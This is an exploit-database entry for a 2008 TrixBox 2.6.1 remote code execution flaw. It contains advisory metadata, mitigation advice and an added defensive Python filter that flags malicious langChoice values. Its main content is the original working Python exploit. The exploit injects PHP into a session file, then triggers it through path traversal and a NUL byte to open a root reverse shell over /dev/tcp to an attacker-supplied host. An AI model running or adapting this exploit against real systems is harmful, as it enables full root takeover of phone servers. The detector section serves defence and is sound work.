Vendor: TrixBox
By: Muts from Offensive-Security.com
CVSS: 9.3 (HIGH)
Remote Code Execution
CWE: 94
Product Name: TrixBox
Affected Version From: 2.6.2001
Affected Version To: 2.6.2001
Patch Exists: YES
Related CWE: N/A
CPE: a:trixbox:trixbox:2.6.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2008

TrixBox 2.6.1 langChoice remote root exploit

This exploit targets a remote code execution vulnerability in TrixBox 2.6.1. It allows an attacker to inject malicious code into the PHP session file through the langChoice parameter of /user/index.php; the server executes that code when a second request points langChoice at the session file. It was discovered by Jean-Michel BESNARD and published by Offensive Security. It requires the attacker to be able to reach the target server and send crafted HTTP requests.

Mitigation:

The best way to mitigate this vulnerability is to upgrade to a newer version of TrixBox that is not affected by this exploit.
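For screening requests to /user/index.php, the following added example (not part of the original advisory or of TrixBox) inspects a urlencoded POST body and reports langChoice values that carry the markers visible in the exploit below: a PHP open tag, path traversal, a NUL byte, or a session file name. The allow-list pattern and all sample bodies are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Assumption: legitimate language names are short alphabetic tokens such as
# "english" (the value the page's cleanup request sends).
ALLOWED = re.compile(r"[A-Za-z_]{1,32}")

# Markers taken from the two malicious requests shown on this page.
CHECKS = [
    ("php-tag", re.compile(r"<\?")),
    ("path-traversal", re.compile(r"\.\.[/\\]")),
    ("null-byte", re.compile(r"\x00")),
    ("session-file", re.compile(r"sess_[0-9A-Za-z]+")),
]


def inspect_lang_choice(body):
    """Return a list of findings for one urlencoded POST body."""
    findings = []
    # parse_qsl percent-decodes values, so %00 and %2F are seen decoded.
    for name, value in parse_qsl(body, keep_blank_values=True):
        if name != "langChoice":
            continue
        hits = [label for label, rx in CHECKS if rx.search(value)]
        if not hits and not ALLOWED.fullmatch(value):
            hits = ["not-allow-listed"]
        findings.extend(hits)
    return findings


# Constructed sample bodies (not captured traffic).
SAMPLES = [
    "langChoice=english",
    "langChoice=<?php phpinfo() ?>",
    "langChoice=../../../../tmp/sess_0123456789abcdef0123456789abcdef%00",
    "langChoice=fr%2Fextra",
]

if __name__ == "__main__":
    for body in SAMPLES:
        result = inspect_lang_choice(body)
        print("%-8s %s" % ("BLOCK" if result else "allow", result))
```
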

Exploit-DB raw data:

#!/usr/bin/python
# TrixBox 2.6.1 langChoice remote root exploit
# muts from offensive-security.com
# All credits to Jean-Michel BESNARD <jmbesnard@gmail.com>
# Same same, but different.
# http://www.offensive-security.com/0day/trixbox.py.txt
##################################################################################################
# id
# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
# uname -a
# Linux trixbox1.localdomain 2.6.25.7 #4 SMP Tue Jun 17 19:35:11 EDT 2008 i686 i686 i386 GNU/Linux
##################################################################################################

import sys
from socket import *
import re
import os
from time import sleep

print ("[*] BY THE POWER OF GRAYSKULL - I HAVE THE ROOTZ0R!\r\n"
"[*] TrixBox 2.6.1 langChoice remote root exploit \r\n"
"[*] http://www.offensive-security.com/0day/trixbox.py.txt\r\n")

if (len(sys.argv)!=5):
	print "[*] Usage: %s <rhost> <rport> <lhost> <lport>" % sys.argv[0]
	exit(0)

host=sys.argv[1]
port=int(sys.argv[2])
lhost=sys.argv[3]
lport=int(sys.argv[4])


def create_post(injection):
        buffer=("POST /user/index.php HTTP/1.1 \r\n"
        "Host: 192.168.219.132 \r\n"
        "Content-Type: application/x-www-form-urlencoded \r\n"
        "Content-Length: "+str(len(injection))+"\r\n\r\n" +injection)
        return buffer

def send_post(host,port,input):
	s = socket(AF_INET, SOCK_STREAM)
	s.connect((host, port))
	s.send(input)
	output=s.recv(1024)
	s.close()
	return output

def find_sessionid(http_output):
	headers=re.split("\n",http_output)
	for header in headers:
	        if re.search("Set-Cookie",header):
           	    	cook=header.split(" ")
			sessionid=cook[1][10:42]
	                print "[*] Session ID is %s" % sessionid
			return sessionid


print "[*] Injecting reverse shell into session file"
bash_inject="langChoice=<?php shell_exec(\"sudo /bin/bash 0</dev/tcp/"+lhost+"/"+str(lport)+" 1>%260 2>%260\");?>" 
reverse=create_post(bash_inject)
raw_session=send_post(host,port,reverse)

print "[*] Extracting Session ID"
id=find_sessionid(raw_session)

print "[*] Triggering Reverse Shell to %s %d in 3 seconds" % (lhost,lport)
sleep(3)
print "[*] Skadush! \r\n[*] Ctrl+C to exit reverse shell."
tmpsession=create_post('langChoice=../../../../../../../../../../tmp/sess_'+id+'%00')
send_post(host,port,tmpsession)

print "[*] Cleaning up"
cleanup=create_post('langChoice=english')
send_post(host,port,cleanup)
send_post(host,port,cleanup)
print "[*] Done!"

# milw0rm.com [2008-07-12]